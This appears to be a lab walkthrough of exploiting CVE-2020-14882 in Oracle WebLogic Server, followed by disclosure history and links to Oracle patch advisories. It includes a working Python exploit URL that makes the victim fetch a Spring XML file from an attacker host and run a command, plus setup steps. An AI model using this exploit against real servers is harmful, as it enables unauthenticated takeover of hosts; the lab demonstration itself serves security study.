- Introduction
CVE-2020-14882 is a remote code execution (RCE) flaw in the Console component of Oracle WebLogic Server. The pre-authentication flaw was given an attack complexity of “low” and highlighted as “easily exploitable” by Oracle resulting in it being assigned a critical CVSSv3 score of 9.8. Successful exploitation would allow an unauthenticated attacker to compromise the Oracle WebLogic server over HTTP and take complete control of the host. (About more - Tenable)
- Score Severity - CVSS 3
⚠️
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
Victim (WebLogic Server): 192.168.0.15 - Windows 10 PRO running WebLogic Server.
Attacker (Hosted file XML): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
- For the first step, let's create a python file that will exploit the vulnerability in weblogic.
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
This payload will call a spring framework XML library to send a request to a server in the attacker's domain looking for the teste.xml file.
- We need to prepare the XML file that will be called by the victim. We created a standard XML structure, however, we included the framework and the value fields are important in this step because they will be executed on the victim. For this example, we are calling the Windows calculator file.
- On the attacker's host, we need to create a server with the XML file to be requested by the victim. For ease, we use our own python server http.server.
- Starting the attack 🎯. We start the script from step 1, In this step, we were able to identify the log of the XML file calls being made by the victim
- RCE successfully executed 💥. On the victim's side, it is possible to view the remote execution (RCE) of the windows calculator
On October 28, security researcher named Jang published a blog post (in Vietnamese) about CVE-2020-14882, including partial details that could be used for a PoC. Jang is no stranger to WebLogic flaws, being credited with discovering and reporting CVE-2020-2555 to Oracle, which patched the vulnerability in its January 2020 CPU. In March, Jang confirmed that CVE-2020-2555 was not completely fixed. The bypass for CVE-2020-2555 was disclosed by another researcher, Quynh Le of VNPT Information Security Center (ISC). Both Le and Jang are credited with reporting this bypass, which is identified as CVE-2020-2883. (About more - Tenable)
-
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Suporte Oracle)
-
Oracle Critical Patch Update Advisory - October 2020. (Suporte Oracle)
-
How to Mitigate the Impact of CVE-2020-14882 Weblogic. (Suporte Oracle)
-
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. (Mitre - CVE)